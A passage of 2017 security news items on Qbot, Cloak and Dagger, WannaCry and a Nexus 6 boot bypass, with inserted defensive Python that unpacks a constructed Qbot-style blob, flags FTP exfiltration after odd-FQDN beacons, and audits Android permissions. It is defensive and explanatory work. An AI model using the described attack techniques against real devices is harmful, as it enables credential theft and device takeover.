According to the Department of Justice, the defendants have been involved in Internet scams since at least 2001, with intended losses totaling tens of millions of dollars.

The scheme often started with a romance scam targeting U.S. citizens, who were tricked into believing that they were in a romantic relationship with a persona made up by the scammers.

Once they gained the victim’s trust, the perpetrators asked them to send money or help carry out various activities, such as laundering money via Western Union and MoneyGram, cashing counterfeit checks, and reshipping items purchased with stolen credit cards. The scammers also used stolen personal information to take control of bank accounts.

Authorities have published a list of email addresses and names used in this operation, urging other potential victims to come forward.


Qbot Infects Thousands in New Campaign

26.5.2017 securityweek BotNet
A recent distribution campaign resulted in thousands of machines being infected with the Qbot malware, Cylance security researchers warn.

Qbot, which is also known as Qakbot or Quakbot, has been around since 2009, but multiple layers of obfuscation, server-side polymorphism and periodic improvements allow it to remain a persistent threat.

The malware is known for its credential stealing functionality and the ability to spread through network shares, but also includes backdoor capabilities. For two weeks in February last year, the threat managed to ensnare over 50,000 computers worldwide into a botnet. In July, a SentinelOne report on the Furtim-related SFG malware tied Qbot to a fast-flux proxy-based network called Dark Cloud or Fluxxy.

What’s unclear regarding the newly observed Qbot outbreak is how the malware managed to infect such a large number of machines in a short period of time. Most probably, Cylance says, updated exploit kits helped with the distribution.

The core functionality of Qbot has remained fairly consistent over the years, and the polymorphic nature of the threat helped it evade detection. Focusing on this aspect allowed the researchers to discover how often the executable code is modified.

The same as with previously observed samples, the malware continues to configure a scheduled task to request updates, with one command set to run on a weekly basis. The payload received from the server is encrypted, and “the first 20 bytes serve as the RC4 key to decrypt the data,” the security researchers say.
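An added illustration of the payload layout Cylance describes (the first 20 bytes of the downloaded blob are the RC4 key for the rest), written here for analysts who want to unpack such an update offline. This is not Cylance's or Qbot's code; RC4 is implemented in plain Python, and the encrypted blob is constructed inside the script, with a fake "MZ" body, so that nothing real is needed to run it.

```python
"""Unpack a Qbot-style update blob whose first 20 bytes are the RC4 key.

Added example; the blob below is constructed in this file, not a real sample.
"""
import hashlib

KEY_LEN = 20  # per the Cylance write-up: the leading 20 bytes are the RC4 key


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (key scheduling + keystream). Symmetric: one call encrypts or decrypts."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def decrypt_update(blob: bytes) -> bytes:
    """Split the blob into key prefix and ciphertext body and decrypt the body."""
    if len(blob) <= KEY_LEN:
        raise ValueError("blob too short to hold a %d-byte key and a payload" % KEY_LEN)
    key, body = blob[:KEY_LEN], blob[KEY_LEN:]
    return rc4(key, body)


def looks_like_pe(data: bytes) -> bool:
    """Cheap sanity check after decryption: a Windows executable starts with 'MZ'."""
    return data[:2] == b"MZ"


# Constructed sample: a fake executable body encrypted under a 20-byte key.
# SHA-1 is used only because its digest is exactly 20 bytes long.
SAMPLE_KEY = hashlib.sha1(b"constructed-example-key").digest()
SAMPLE_PLAINTEXT = b"MZ" + b"\x90" * 62 + b"constructed fake update body"
SAMPLE_BLOB = SAMPLE_KEY + rc4(SAMPLE_KEY, SAMPLE_PLAINTEXT)

if __name__ == "__main__":
    plaintext = decrypt_update(SAMPLE_BLOB)
    print("decrypted %d bytes; PE-like: %s" % (len(plaintext), looks_like_pe(plaintext)))
```

Because the key travels with the ciphertext, the encryption here buys the malware nothing against an analyst who has the blob; it only defeats naive content inspection, which is why the "MZ" check right after decryption is a useful first triage step.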

By creating a script to send HTTP requests to each of the three URLs the malware itself receives updates from, the security researchers discovered that files with a unique hash would be supplied every 10 minutes. They also managed to collect a total of 140 unique files supplied by the server over a period of 24 hours.

“All 141 downloaded files were 32-bit Windows executables. Across the 141 files, all have unique compile timestamps, and the earliest one occurred on May 15, 2017,” the researchers say.

Analyzing two files with the same import hash but with different file hashes revealed that, of nine PE sections each of them contains (.text, .code, .rdata, .data, .CRT, .exp, .code (again), .rsc, and .reloc), all section hashes match except those for .text, .rdata, and .data.

Different .text sections could reveal a change in executable code, and initial analysis revealed that all 27 functions identified matched 100%. Following deobfuscation, however, the security researchers discovered that nine functions had received some changes, although the overall Qbot functionality remained the same.

“Qakbot continues to be a significant threat due to its credential collection capabilities and polymorphic features. Unhindered, this malware family can rapidly propagate through network shares and create an enterprise-wide incident,” Cylance notes.

In an emailed comment to SecurityWeek, Michael Patterson, CEO of Plixer, pointed out that there is no shortage of vulnerabilities that malicious applications can exploit and that threats will continue to evolve. Thus, defense systems should adapt to ensure more efficient detection.

“Qakbot’s dynamic polymorphic abilities make it particularly evasive to antivirus systems. This means the virus can more easily maintain its presence without being detected," Patterson said. "It does however need to communicate on the network in order to carry out its dastardly deeds. In the case of Qakbot, it uses HTTPS to communicate with command-and-control (C&C) and FTP to upload stolen data. Network Traffic Analytics can be leveraged against flow data to watch for this one-two punch combination, especially where odd FQDN patterns are detected.”
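The "one-two punch" Patterson describes can be turned into a concrete flow rule. The following is an added example of such a rule, not Plixer's or Cylance's code: the flow records are constructed here (documentation IP ranges and reserved .test/example domains), and the "odd FQDN" heuristic (high label entropy or a high digit ratio) is my own stand-in for whatever scoring a traffic-analytics product applies. A host is flagged only when it shows both an HTTPS connection to an odd name and a sizeable FTP upload, so either signal alone stays quiet.

```python
"""Flow-level detection of HTTPS beacons to odd FQDNs combined with FTP uploads.

Added example with constructed flows; thresholds are heuristics to tune against
your own DNS and flow baseline.
"""
import math
from collections import defaultdict
from typing import Dict, List, Tuple

# Constructed flow records: (src_host, dst_name_or_ip, dst_port, bytes_out)
Flow = Tuple[str, str, int, int]
FLOWS: List[Flow] = [
    ("10.0.0.5", "updates.example.com", 443, 1_200),
    ("10.0.0.5", "mail.example.com", 443, 900),
    ("10.0.0.7", "x7k2q9vb3n1p.test", 443, 800),     # odd name over HTTPS
    ("10.0.0.7", "x7k2q9vb3n1p.test", 443, 700),
    ("10.0.0.7", "198.51.100.23", 21, 2_400_000),    # large FTP upload
    ("10.0.0.9", "cdn.example.net", 443, 5_000),
    ("10.0.0.9", "203.0.113.8", 21, 3_000_000),      # FTP upload alone: not flagged
    ("10.0.0.11", "qz81mv4hs0wd.test", 443, 600),    # odd name alone: not flagged
]

ENTROPY_THRESHOLD = 3.3          # bits per character of the registrable label
DIGIT_RATIO_THRESHOLD = 0.3      # share of digits in the registrable label
FTP_UPLOAD_THRESHOLD = 1_000_000  # bytes sent over port 21 in the window


def shannon_entropy(s: str) -> float:
    """Shannon entropy in bits per character of the string s."""
    if not s:
        return 0.0
    counts: Dict[str, int] = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def is_odd_fqdn(name: str) -> bool:
    """Heuristic: the registrable label is high-entropy or digit-heavy (DGA-like)."""
    if name.replace(".", "").isdigit():
        return False  # bare IPv4 literal: nothing to score
    parts = name.split(".")
    label = parts[-2] if len(parts) >= 2 else parts[0]
    if not label:
        return False
    digit_ratio = sum(ch.isdigit() for ch in label) / len(label)
    return shannon_entropy(label) >= ENTROPY_THRESHOLD or digit_ratio >= DIGIT_RATIO_THRESHOLD


def detect(flows: List[Flow]) -> List[str]:
    """Hosts that show BOTH an HTTPS connection to an odd FQDN and an FTP upload."""
    odd_https: Dict[str, bool] = defaultdict(bool)
    ftp_bytes: Dict[str, int] = defaultdict(int)
    for src, dst, port, out in flows:
        if port == 443 and is_odd_fqdn(dst):
            odd_https[src] = True
        elif port == 21:
            ftp_bytes[src] += out
    return sorted(h for h in odd_https if ftp_bytes[h] >= FTP_UPLOAD_THRESHOLD)


if __name__ == "__main__":
    for host in detect(FLOWS):
        print("review host:", host)
```

Requiring both behaviours keeps false positives down in environments where legitimate FTP uploads or CDN hostnames with random-looking labels are common; the entropy and digit-ratio cut-offs are starting points, not calibrated values.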


3 Nigerian Scammers Get 235 Years of Total Jail Sentence in U.S.
26.5.2017 thehackernews  Crime
You may have heard of hilarious Nigerian scams. My all-time favourite is this one:
A Nigerian astronaut has been trapped in space for the past 25 years and needs $3 million to get back to Earth. Can you help?
Moreover, Nigerians are also good at promising true love and happiness.
But you know, love hurts.
Those looking for true love and happiness have lost tens of millions of dollars to Nigerian dating and romance scams.
These criminals spend their whole day trawling online dating sites for contact emails and then send off hundreds of thousands of fraudulent emails, awaiting the victims' responses.
A US federal district court in Mississippi has sentenced three such Nigerian scammers to a collective 235 years in prison for their roles in a large-scale international fraud network that duped people out of tens of millions of dollars.
The three Nigerian nationals were part of a 21-member gang of cyber criminals, of which six, including Ayelotan, Raheem, and Mewase, were extradited from South Africa to the Southern District of Mississippi in July 2015 to face charges in the case.
Oladimeji Seun Ayelotan, 30, faces up to 95 years in prison
Rasaq Aderoju Raheem, 31, faces up to 115 years in prison
Femi Alexander Mewase, 45, faces up to 25 years in prison
A federal jury found all of them guilty of offenses involving mail fraud, wire fraud, credit card fraud, identity theft, and theft of government property, the US Department of Justice announced Thursday.
Also, Ayelotan and Raheem were found guilty of conspiracies to commit bank fraud and money laundering, which is why they have been given longer prison sentences.
So far, the Justice Department has charged a total of 21 suspects in this case: 12 defendants have already pleaded guilty to charges related to the conspiracy, while 11 have been sentenced to date.
The gang has been operating since 2001 and ran a variety of online scams, including romance scams, where the criminals used the false identity of love-struck girlfriends on a dating site to establish a romantic relationship with unsuspecting victims.
Once the gang members gained the victim's trust and affection, they would convince them to take part in their money laundering schemes and launder money from other rackets via MoneyGram and Western Union, or to resend electronics and other goods bought with stolen credit cards to countries where they could be sold for a profit.
The gang members were arrested by South African police in a joint operation with U.S. Immigration and Customs Enforcement's Homeland Security Investigations (HSI) and the U.S. Postal Inspection Service in December 2015.
However, Nigerian scams will never die, and you could be their next victim.


All Android Phones Vulnerable to Extremely Dangerous Full Device Takeover Attack
26.5.2017 thehackernews Android
Researchers have discovered a new attack, dubbed 'Cloak and Dagger', that works against all versions of Android, up to version 7.1.2.
Cloak and Dagger attack allows hackers to silently take full control of your device and steal private data, including keystrokes, chats, device PIN, online account passwords, OTP passcode, and contacts.
What's interesting about Cloak and Dagger attack?
The attack doesn't exploit any vulnerability in the Android ecosystem; instead, it abuses a pair of legitimate app permissions that are widely used in popular applications to access certain features on an Android device.
Researchers at the Georgia Institute of Technology discovered the attack and successfully performed it on 20 people, none of whom was able to detect any malicious activity.
Cloak and Dagger attacks utilise two basic Android permissions:
SYSTEM_ALERT_WINDOW ("draw on top")
BIND_ACCESSIBILITY_SERVICE ("a11y")
The first permission, known as "draw on top," is a legitimate overlay feature that allows apps to draw over a device's screen, on top of other apps.
The second permission, known as "a11y," is designed to help disabled, blind and visually impaired users, allowing them to enter input using voice commands or listen to content using the screen reader feature.
Scary Things Hackers Can Do to Your Android (Demo)
Since the attack does not require any malicious code to perform the trojanized tasks, it becomes easier for hackers to develop and submit a malicious app to Google Play Store without detection.
Unfortunately, it’s a known fact that the security mechanisms used by Google are not enough to keep all malware out of its app market.
If you follow the regular security updates from The Hacker News, you are probably well aware of frequent headlines like "hundreds of apps infected with adware targeting Play Store users" and "ransomware apps found on Play Store."
Just last month, researchers uncovered several Android apps masquerading as an innocent "Funny Videos" app on Play Store, with over 5,000 downloads, that distributed the 'BankBot banking Trojan', which steals victims' banking passwords.
Here's how the researchers explained getting their app onto the Google Play Store to perform Cloak & Dagger attacks:
"In particular, we submitted an app requiring these two permissions and containing a non-obfuscated functionality to download and execute arbitrary code (attempting to simulate a clearly malicious behavior): this app got approved after just a few hours (and it is still available on the Google Play Store)," the researchers say.
Once installed, the researchers say the attacker can perform various malicious activities including:
Advanced clickjacking attack
Unconstrained keystroke recording
Stealthy phishing attack
Silent installation of a God-mode app (with all permissions enabled)
Silent phone unlocking and arbitrary actions (while keeping the screen off)
In short, the attackers can secretly take over your Android device and spy on everything you do on your phone.
Researchers have also provided the video demonstrations of a series of Cloak and Dagger attacks, which will blow your mind, trust me.


Google Can’t Fix It, At Least Not So Fast
University researchers have already disclosed this new attack vector to Google but noted that since the issue resides in the way Android OS has been designed, involving two of its standard features that behave as intended, the problem could be difficult to resolve.
"Changing a feature is not like fixing a bug," said Yanick Fratantonio, the paper's first author. "System designers will now have to think more about how seemingly unrelated features could interact. Features do not operate separately on the device."
As we reported earlier, Google gives "SYSTEM_ALERT_WINDOW" ("draw on top") permission to all applications directly installed from the official Google Play Store since Android Marshmallow (version 6), launched in October 2015.
This feature, which lets malicious apps hijack a device's screen, is one of the most widely exploited methods used by cyber criminals and hackers to trick unwitting Android users into falling victim to malware and phishing scams.
However, Google has planned to change its policy in 'Android O,' which is scheduled for release in the 3rd quarter this year.
So, users need to wait for a long, long time, as millions of users are still waiting for Android Nougat (N) from their device manufacturers (OEMs).
In other words, the majority of smartphone users will continue to be victimised by ransomware, adware and banking Trojans for at least the next year.
Temporary Mitigation
The easiest way to disable the Cloak and Dagger attacks in Android 7.1.2 is to turn off the "draw on top" permission by going to:
Settings → Apps → Gear symbol → Special access → Draw over other apps.
The simplest universal precaution against being hacked is to download apps only from the Google Play Store, and only from trusted and verified developers.
You are also advised to check app permissions before installing apps. If any app is asking for more than it needs for its stated purpose, just do not install it.
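The advice above is per-app and manual. The following is an added example (not from the Georgia Tech researchers or The Hacker News) of how an administrator could audit a fleet for the permission pair instead. It parses two pieces of text modelled on what `adb shell dumpsys package` and `adb shell settings get secure enabled_accessibility_services` return; both samples are constructed and simplified, and the package names are invented. An app that requests SYSTEM_ALERT_WINDOW and also owns an enabled accessibility service is the combination the researchers describe, so it is listed for review.

```python
"""List installed apps that hold both 'draw on top' and an enabled accessibility service.

Added example. The two sample texts below are constructed and modelled on
`dumpsys package` and the `enabled_accessibility_services` secure setting; real
output contains many more fields, which this parser simply skips.
"""
import re
from typing import Dict, List, Set

OVERLAY_PERM = "android.permission.SYSTEM_ALERT_WINDOW"

# Constructed excerpt modelled on `adb shell dumpsys package`
DUMPSYS_PACKAGE_SAMPLE = """\
Packages:
  Package [com.example.notes] (1a2b3c):
    userId=10101
    requested permissions:
      android.permission.INTERNET
      android.permission.SYSTEM_ALERT_WINDOW
    install permissions:
      android.permission.INTERNET: granted=true
  Package [com.example.reader] (4d5e6f):
    userId=10102
    requested permissions:
      android.permission.INTERNET
  Package [com.example.overlayhelper] (7a8b9c):
    userId=10103
    requested permissions:
      android.permission.SYSTEM_ALERT_WINDOW
      android.permission.INTERNET
"""

# Constructed value modelled on `settings get secure enabled_accessibility_services`
# (colon-separated list of package/service components)
ENABLED_A11Y_SAMPLE = (
    "com.example.overlayhelper/.HelperService:"
    "com.example.reader/com.example.reader.ReadAloudService"
)

PKG_RE = re.compile(r"^\s*Package \[([^\]]+)\]")


def requested_permissions(dumpsys_text: str) -> Dict[str, Set[str]]:
    """Map package name -> permissions listed under its 'requested permissions:' block."""
    result: Dict[str, Set[str]] = {}
    current = None
    in_requested = False
    for line in dumpsys_text.splitlines():
        m = PKG_RE.match(line)
        if m:
            current = m.group(1)
            result[current] = set()
            in_requested = False
            continue
        stripped = line.strip()
        if stripped.endswith(":") and not stripped.startswith("android.permission."):
            # a sub-section header such as 'install permissions:' ends the requested block
            in_requested = stripped == "requested permissions:"
            continue
        if current and in_requested and stripped.startswith("android.permission."):
            result[current].add(stripped)
    return result


def enabled_accessibility_packages(setting_value: str) -> Set[str]:
    """Package names owning an enabled accessibility service ('pkg/service:pkg/service')."""
    pkgs: Set[str] = set()
    for entry in setting_value.split(":"):
        entry = entry.strip()
        if entry:
            pkgs.add(entry.split("/", 1)[0])
    return pkgs


def cloak_and_dagger_candidates(dumpsys_text: str, a11y_setting: str) -> List[str]:
    """Apps that both request 'draw on top' and run an enabled accessibility service."""
    overlay = {pkg for pkg, perms in requested_permissions(dumpsys_text).items()
               if OVERLAY_PERM in perms}
    return sorted(overlay & enabled_accessibility_packages(a11y_setting))


if __name__ == "__main__":
    for pkg in cloak_and_dagger_candidates(DUMPSYS_PACKAGE_SAMPLE, ENABLED_A11Y_SAMPLE):
        print("review:", pkg)
```

A hit is not proof of malice (screen readers and some assistive tools legitimately need both), but it is the short list worth reviewing by hand, and the same two commands can be run over every enrolled device from a management host.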


Terra Privacy Product Uses Dynamic Whitelisting to Block Attacks

26.5.2017 securityweek Safety
Terra Privacy announced on Wednesday a new product that uses dynamic whitelisting to block malware and phishing attacks. A free beta version of the endpoint security product is available for testing.

Terra Privacy was founded by Michael Wood, the cryptographer who designed the REDOC II encryption system. The company’s latest product, Hacker Deterrent Pro, uses dynamically-generated whitelists to ensure that web browsers and other applications only communicate with the servers they are supposed to.

Hacker Deterrent Pro has three main features: Two-Factor Browsing, App Firewall, and DNS Shield.

Two-Factor Browsing ensures that the browser only communicates with trusted domains. To achieve this, the product creates a real-time transient whitelist that contains only the names of webpages opened by the user and the names of other sites from which content is pulled, while any other connection attempt is blocked.

This prevents browser-based threats from communicating with their command and control (C&C) servers, and it can also be used to block commercial trackers.

Traditional whitelisting can be impractical as users have to manually add each website. Hacker Deterrent aims to address this problem by creating transient whitelists that are empty when the web browser is first opened. Each time the user visits a website, that site is automatically added to the whitelist and removed from the whitelist when the page is closed.

This method can also be efficient against sophisticated phishing attacks as Hacker Deterrent Pro will block unauthorized domains even if they look legitimate. The vendor demonstrated its product’s capabilities by showing how it could block phishing sites that use a recently disclosed Unicode-based technique.

According to the company, the solution can also block non-browser Trojans that inject themselves into running processes by preventing them from communicating with domains other than ones belonging to the hijacked app’s developer. For example, the explorer.exe process, which is often targeted by malware, should only be allowed to communicate with Microsoft servers.

The app firewall initially blocks all applications from accessing the Web, and provides information about the app and the host it wants to connect to, allowing users to determine if the connection should be allowed.
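To make the three behaviours described above concrete (a transient whitelist that fills as pages open and empties as they close, a fixed vendor-domain policy for non-browser processes such as explorer.exe, and a default-deny app firewall), here is an added model of the decision logic. It is my own illustration, not Terra Privacy's code: the page hosts, process names and the microsoft.com suffix policy are constructed, and the model adds one detail the text does not spell out, reference counting, so that closing one tab does not unwhitelist a host another open tab still needs.

```python
"""Model of dynamic (transient) whitelisting for a browser plus a static per-app policy.

Added example; hosts, processes and policy entries are constructed.
"""
from collections import Counter
from typing import Dict, Iterable, Set, Tuple

BROWSER = "browser"


class TransientWhitelist:
    """Empty when the browser starts; hosts are added while a page is open and
    removed when it closes. Reference counts handle hosts shared by several pages."""

    def __init__(self) -> None:
        self._refs: Counter = Counter()
        self._pages: Dict[str, Set[str]] = {}

    def open_page(self, page_id: str, hosts: Iterable[str]) -> None:
        hosts = set(hosts)          # the page's own host plus hosts it pulls content from
        self._pages[page_id] = hosts
        for host in hosts:
            self._refs[host] += 1

    def close_page(self, page_id: str) -> None:
        for host in self._pages.pop(page_id, set()):
            self._refs[host] -= 1
            if self._refs[host] <= 0:
                del self._refs[host]

    def allows(self, host: str) -> bool:
        return self._refs[host] > 0  # Counter returns 0 for unknown hosts


# Constructed static policy: non-browser processes may only reach their vendor's domains
APP_POLICY: Dict[str, Tuple[str, ...]] = {
    "explorer.exe": ("microsoft.com",),
}


def decide(process: str, host: str, wl: TransientWhitelist) -> bool:
    """Allow or block one outbound connection attempt."""
    if process == BROWSER:
        return wl.allows(host)
    suffixes = APP_POLICY.get(process)
    if not suffixes:
        return False  # app firewall default: an unknown app gets no Web access
    return any(host == s or host.endswith("." + s) for s in suffixes)


def demo() -> Dict[str, bool]:
    """Walk through the scenarios and return each decision, keyed by description."""
    wl = TransientWhitelist()
    wl.open_page("tab1", ["news.example.com", "cdn.example.net"])
    wl.open_page("tab2", ["shop.example.org", "cdn.example.net"])
    results = {
        "page host while open": decide(BROWSER, "news.example.com", wl),
        "unrelated host blocked": decide(BROWSER, "tracker.example.test", wl),
    }
    wl.close_page("tab1")
    results["shared cdn survives one close"] = decide(BROWSER, "cdn.example.net", wl)
    results["closed page host gone"] = decide(BROWSER, "news.example.com", wl)
    results["explorer to vendor"] = decide("explorer.exe", "update.microsoft.com", wl)
    results["explorer elsewhere"] = decide("explorer.exe", "cdn.example.net", wl)
    results["unknown app default deny"] = decide("unknown.exe", "cdn.example.net", wl)
    return results


if __name__ == "__main__":
    for label, allowed in demo().items():
        print("%-32s %s" % (label, "ALLOW" if allowed else "BLOCK"))
```

The weak point of any such model is the "hosts it pulls content from" input: if that list is populated from what the page asks for rather than from what the user opened, an injected script can whitelist its own server, so a real product has to decide which resource loads count as user intent.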

The product’s DNS Shield allows users to select DNS servers based on their personal preferences, blocking ISPs from adding their own list of DNS servers. For instance, users can choose DNS servers that reject connections to IPs that are known to host malware.

The beta version of Hacker Deterrent Pro can be tested for free. The commercial version of the product, expected to become available in mid-July, will cost $39.99 per year per endpoint. The solution works on Windows PCs using the Chrome and Firefox web browser.


Survey Shows Disparity in GDPR Preparedness and Concerns

26.5.2017 securityweek Privacy
The European General Data Protection Regulation will take effect in exactly one year from today. It will affect any company that does business with the EU, whether that company is based in Europe or elsewhere (such as the US). While there have been many surveys indicating that affected firms are far from prepared, there are few that highlight the geographic disparity in readiness.

One Year Out: Views on GDPR (PDF), conducted by Vanson Bourne for Varonis, is particularly detailed. It surveyed 500 IT decision makers in organizations with more than 1,000 employees in the US (200), the UK (100), Germany (100) and France (100). Unlike many such surveys, it includes the raw data, allowing readers to dig deep into areas of interest or concern.

Unsurprisingly, given other surveys, the headline result is that 75% of respondents "face serious challenges in being compliant with the EU GDPR by 25th May 2018." This result is consistent across all four nations; but those who strongly agree range from 15% in the UK (the lowest) to 25% (the highest) in the US.

The cause of this disparity may be found in senior management's attitude towards GDPR. Overall, 42% of companies do not view compliance by the deadline as a priority. Thirteen percent of firms 'strongly agree' with this -- but the detail ranges from just 6% in the UK to 19% in the US (France and Germany are equal at 10%).

It is tempting to suggest that this is influenced by history: the UK regulator has traditionally been 'business-friendly', allowing companies to be more relaxed towards data protection than counterparts in France and Germany. US companies (apart from the major tech industries such as Google, Facebook and Microsoft), have little experience of European regulators.

But while the survey may indicate a lack of urgency at the management level, the respondents themselves indicate serious concern over the potential effect of GDPR. Overall, 75% of respondents believe that fines imposed for breaching regulations could cripple some organizations. Here, US concerns (81%) are above average, with France being the least concerned at 64%. It would appear that US practitioners are more concerned about GDPR than are their managers.

The survey also provides detail on what aspects of GDPR are most concerning. Not surprisingly, the erasure right (the right-to-be-forgotten) in Article 17 tops the list at 55% overall. Somewhat surprisingly given the apparent link between this and the American constitutional right to freedom of speech, the US respondents were the least concerned at 48%. Equally surprising, UK concern was by far the highest at 71%.

The second biggest concern is the requirement for processing activities, contained in Article 30; that is, visibility into and control over who has access to the data. Overall concern was steady at 52%, with regional variations limited to the lowest at 50% (UK) and the highest at 53% (US).

"What's most worrying about the findings," comments Matt Lock, director of sales engineers at Varonis, "is that one in four organizations doesn't have a handle on where its sensitive data resides. These companies are likely to have a nasty wake-up call in one year's time. If they don't have this fundamental insight into where sensitive data sits within their organizations and who can and is accessing it, then their chances of getting to first base with the regulations are miniscule and they are putting themselves firmly at the front of the queue for fines."

The concern showing the greatest disparity is over data protection by design (Article 25). The least concern comes from France at 35%, with the highest from the US at 55% (this is the highest of all concerns for the US respondents). It seems to reflect a general concern that GDPR might impinge on innovation -- with the highest concern coming from perhaps the most entrepreneurial nation.

It would be wrong, however, to think that the respondents have only negative thoughts and worries about GDPR. Thirty-six percent of respondents believe it will be very beneficial for both consumers and organizations. This, however, ranges from a very low 12% in the UK to an encouraging 47% in the US. In purely business terms, 57% of UK respondents believe it will prove troublesome for organizations, while only 36% of US respondents think the same.

The top benefit for private citizens is that their personal data will be better protected (54%). The UK (61%) and the US (59%) lead France (45%) and Germany (47%) in this. The order is reversed, however, over whether GDPR will make it less likely that PII will be passed to third parties. The UK (24%) and the US (32%) are behind both France (35%) and Germany (36%). Confirming these views, very few respondents could see no benefits from GDPR -- and most of those seem to be in the UK (11%). Only 5% of US organizations hold a similar view.

A particularly interesting section of the report deals with expected outcomes from the GDPR, with wide variations on which regulator is expected to be the most stringent. Overall, Germany tops the list at 76%, with German respondents in the lead at 85%. The UK is second overall at 57% -- which could be surprising given the UK regulator's soft historical approach and the UK government's insistence that it will implement GDPR in as business-friendly manner as possible. This view is distorted, however, by the UK and US respondents' score at 76% each. France (35%) and Germany (24%) are far less confident that the UK regulator will be rigorous.

Ninety-two percent of respondents suspect a particular industry will be singled out as an example in the event of a breach. Banking is seen as the most likely at 26% overall. This figure is distorted by the UK response at 52%. Both France and Germany individually believe that any example will more likely come from the technology and telecommunications industry.

A high number of respondents (82%) also believe that a particular country will be singled out if one of their organizations is in breach of GDPR. The overall favorite is the UK at 23% -- but this is distorted by the UK respondents (48%) who are perhaps concerned with the after effects of Brexit. Noticeably, only 2% of French and 11% of German respondents have a similar view.

Nevertheless, 68% of respondents believe that a UK company (as opposed to the UK in general) will be singled out and punished because of Brexit. This belief is most strong in the US (77%) and the UK (70%), and less so, but still high, in France (58%) and Germany (57%).

What this survey shows above all is that while there is a general lack of preparedness for GDPR among most organizations, specific concerns and expectations can vary widely between the different nations. The level of detail provided goes far beyond many similar surveys, and allows individual readers to dig deeper into specific areas. The value in this is that by evaluating other countries' and organizations' concerns, individual readers can rate their own preparedness.


Endpoint Security Firm Tanium Raises $100 Million

26.5.2017 securityweek Security
Emeryville, CA-based endpoint security and systems management firm Tanium announced on Thursday that it has raised $100 million through the sale of common stock.

The latest funding round was led by TPG Growth and it brought in a new investor. The $100 million raised through the issuance of common stock – previous funding rounds offered only preferred stock – brings the company’s value to $3.75 billion.

Part of the proceeds have been used to repurchase shares from David Hindawi, co-founder and executive chairman of Tanium, to allow him to fund his charity projects. The rest will be used to provide liquidity to early employees and investors, and for general corporate purposes.

With this funding round, Tanium has raised a total of $407 million. The company reported a revenue growth of more than 100% last year, and it claims to have brought on board nearly 100 new enterprise customers. Clients include U.S. government agencies, 12 of the top 15 banks, and six of the top 10 retailers.

The company’s plans for the future include expansion in the EMEA and APAC regions, establishing a strong presence in the media and manufacturing sectors, further investment into IT operations products and modules, and growth in existing industries.

“Tanium is unique in our industry. In contrast to the cybersecurity-only companies, we provide an endpoint platform that allows communication for massive numbers of assets in a way enterprises have never had before, which is useful across not only security but also operations issues in IT,” said Tanium CEO Orion Hindawi.

“Because of that breadth of offering, our investors see Tanium having longevity and potential that exceeds the typical cybersecurity landscape, and we will work hard to continue proving them right by driving our platform further into both security and operations with each passing quarter,” he added.

Last month, Hindawi published an open letter addressing accusations that the company exposed a California hospital’s network during sales demos, and reports of a toxic staff relations culture.


Linguistic Analysis Suggests WannaCry Authors Speak Chinese

26.5.2017 securityweek  Ransomware
A linguistic analysis of more than two dozen ransom notes displayed by the WannaCry ransomware suggests that its authors are fluent Chinese speakers and they also appear to know English.

While malware code similarities suggest that WannaCry has been developed by the North Korea-linked threat actor known as Lazarus, some believe the attack does not fit Pyongyang’s style and interests.

Researchers at threat intelligence firm Flashpoint have analyzed 28 WannaCry ransom notes, including ones written in Chinese (both simplified and traditional), Danish, Dutch, English, French, German, Indonesian, Italian, Japanese, Korean, Norwegian, Portuguese, Romanian, Russian, Spanish, Swedish and Turkish.

The linguistic analysis showed that there are significant differences between the notes written in Chinese and the ones written in other languages. Evidence suggests that the Chinese note, which mostly uses proper grammar, punctuation and syntax, was actually written with a Chinese-language keyboard.

One of the words used in the Chinese note is more common in South China, Hong Kong, Singapore and Taiwan, while another term is more widely used in mainland China.

Experts pointed out that the note written in Chinese includes a significant amount of content that is not present in other versions, and they believe it may have served as the source for the English version.

The English note is also well written, but it contains a major grammar mistake that suggests its author is either not a native speaker or possibly someone who is not well educated.

Flashpoint has determined that the English note has been used to translate the text into other languages using a service such as Google Translate. Tests conducted by researchers show that there is a match of at least 96 percent between the WannaCry notes and Google-translated versions of the English message.

While WannaCry may have been developed by more than one individual, Flashpoint said with high confidence that the Chinese-language ransom note was written by someone who is fluent in Chinese. The English note was written by someone who knows English, but does not appear to be a native speaker, the company said.

“Given these facts, it is possible that Chinese is the author(s)’ native tongue, though other languages cannot be ruled out,” Flashpoint said. “It is also possible that the malware author(s)’ intentionally used a machine translation of their native tongue to mask their identity. It is worth noting that characteristics marking the Chinese note as authentic are subtle. It is thus possible, though unlikely, that they were intentionally included to mislead.”

While security firms such as Symantec and Kaspersky presented evidence linking WannaCry to North Korea, Cybereason questioned the apparent connection, pointing to differences in tactics and the fact that two of the most impacted countries, Russia and China, are North Korea’s biggest allies.

Researchers at Flashpoint are not the only ones who mentioned China. James Scott, a senior fellow at the Institute for Critical Infrastructure Technology, also believes the attack may have been conducted by hackers from China's People's Liberation Army "moonlighting" in their spare time, or freelance Chinese hackers hired by Pyongyang.


Google Patches Nexus 6 Secure Boot Bypass

26.5.2017 securityweek Android
One of the vulnerabilities addressed by Google in its May 2017 security patches allowed the bypass of Nexus 6’s Secure Boot through kernel command-line injection, HCL Technologies researchers reveal.

By exploiting the flaw, an attacker with physical access to the device or one with authorized-ADB/fastboot USB access to the (bootloader-locked) device could gain unrestricted root privileges and “completely own the user space.” For that, the attacker would have to load a tampered or malicious initramfs image.

Security researcher Roee Hay also explains that, because the exploitation doesn’t lead to a factory reset, user data remains intact and still encrypted. The vulnerability is tracked as CVE-2016-10277.

The issue, Hay says, is a continuation of CVE-2016-8467, a High risk vulnerability affecting the Nexus 6/6P bootloader, which was addressed in Google’s January 2017 security patches. That exploit abused fastboot commands to change the androidboot.mode argument in the kernel command line, and it was addressed by hardening the bootloader.

“Just before Google released the patch, we had discovered a way to bypass it on Nexus 6,” the researcher notes.

Because the fsg-id, carrier and console arguments in Nexus 6’s bootloader can be controlled through the fastboot interface (even if the bootloader is locked), one could pass arbitrary kernel command line arguments if the bootloader didn’t sanitize said three arguments. The researchers also found a series of parameters that can contain arbitrary values and which propagate to the kernel command line.

